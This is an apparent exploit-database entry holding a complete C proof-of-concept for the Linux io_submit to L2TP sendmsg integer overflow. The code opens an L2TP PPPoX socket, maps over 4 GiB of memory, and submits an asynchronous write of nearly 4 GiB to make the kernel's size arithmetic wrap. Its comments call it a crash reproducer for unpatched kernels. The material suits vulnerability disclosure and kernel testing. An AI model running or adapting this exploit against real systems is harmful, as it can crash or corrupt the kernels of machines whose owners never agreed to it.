Linux io_submit L2TP Sendmsg Integer Overflow



EKU-ID: 5416 CVE: OSVDB-ID:
Author: hawkes Published: 2016-02-25 Verified: Verified


#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>

#include <netinet/in.h>

#include <linux/aio_abi.h>
#include <linux/if.h>
#include <linux/if_pppox.h>

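/*
 * Proof-of-concept reproducer for the io_submit -> L2TP sendmsg integer
 * overflow named in the page title.
 *
 * Steps, in order: open an L2TP PPPoX datagram socket, connect it with a
 * management-style address (fd == -1, session ids 0), map and touch a
 * 4 GiB + one page anonymous region, create an AIO context, and submit a
 * single PWRITE on the socket whose aio_nbytes is just under 4 GiB.  The
 * oversized length is what the kernel's sendmsg path receives; per the
 * title it is presumably what makes the kernel-side size arithmetic wrap.
 * The only mitigation is a patched kernel; on an unpatched one this is a
 * crash reproducer, so run it only on a disposable test system.
 *
 * Returns 0 once the submission has been handed to the kernel, -1 (exit
 * status 255, kept from the original) if any setup step fails.
 *
 * Changes from the original: `addr` is zero-initialised instead of being
 * read uninitialised, the mapping length is checked to fit in size_t, and
 * <unistd.h> is relied on for the syscall() prototype.
 */
int main(int argc, char *argv[]) {
    (void)argc;
    (void)argv;

    /* 4 GiB + one page.  Only representable on a 64-bit size_t; on a
     * 32-bit build the constant would silently truncate, so refuse. */
    const unsigned long long map_bytes = 0x100001000ULL;
    const size_t map_len = (size_t)map_bytes;
    if ((unsigned long long)map_len != map_bytes) {
        fprintf(stderr, "mapping length does not fit in size_t (64-bit only)\n");
        return -1;
    }

    int s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
    if (s == -1) {
        perror("socket");
        return -1;
    }

    /* Zero-initialised so the peer address copied into sax below is
     * defined; the original read sin_addr/sin_port from an uninitialised
     * struct, which is undefined behaviour. */
    struct sockaddr_in addr = {0};

    struct sockaddr_pppol2tp sax = {0};
    sax.sa_family = AF_PPPOX;
    sax.sa_protocol = PX_PROTO_OL2TP;
    sax.pppol2tp.fd = -1;               /* no underlying UDP socket supplied */
    sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
    sax.pppol2tp.addr.sin_port = addr.sin_port;
    sax.pppol2tp.addr.sin_family = AF_INET;
    sax.pppol2tp.s_tunnel = -1;
    sax.pppol2tp.s_session = 0;
    sax.pppol2tp.d_tunnel = -1;
    sax.pppol2tp.d_session = 0;

    if (connect(s, (struct sockaddr *)&sax, sizeof sax) == -1) {
        perror("connect");
        return -1;
    }

    void *data = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (data == MAP_FAILED) {
        perror("mmap");
        return -1;
    }
    /* Touch every page so the whole region is backed before the submit. */
    memset(data, 0x41, map_len);

    aio_context_t ctx_id = 0;
    if (syscall(__NR_io_setup, 2, &ctx_id) == -1) {
        perror("io_setup");
        return -1;
    }

    struct iocb iocb = {0};
    iocb.aio_fildes = s;
    iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
    iocb.aio_nbytes = 0xfffffe60;        /* just under 4 GiB; the length handed to sendmsg */
    iocb.aio_buf = (unsigned long)&data; /* user-space source address for the write, as in the original */

    struct iocb *iocbp = &iocb;
    /* Return value intentionally not checked: the kernel-side effect this
     * PoC demonstrates happens during the submit itself, and the original
     * exits 0 regardless of the result. */
    syscall(__NR_io_submit, ctx_id, 1, &iocbp);

    return 0;
}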